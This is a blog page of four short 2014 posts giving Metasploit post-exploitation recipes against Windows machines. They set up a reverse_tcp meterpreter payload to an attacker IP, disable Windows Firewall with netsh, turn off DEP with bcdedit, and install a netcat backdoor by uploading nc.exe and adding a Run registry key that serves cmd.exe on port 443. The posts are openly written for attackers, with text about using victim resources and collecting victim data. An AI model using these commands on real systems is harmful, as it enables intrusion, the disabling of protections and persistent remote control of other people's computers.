Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit


Posted by at No comments:
Labels: , , ,

How to Disable Windows Firewall using Metasploit



Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command : 

netsh firewall set opmode disable 

Posted by at No comments:
Labels: , ,

Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

1 - we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - now we edit in registry to have netcat execute on start up and listen on port 443
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - add our NetCat into start up process
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - To check our backdoor in autorun process or not
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

VIDEO :


Posted by at No comments:
Labels: ,

Wednesday, 9 July 2014

How to stop Date Execution Prevention Service(DEP) using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

Posted by at No comments:
Labels: , , ,
Subscribe to: Comments (Atom)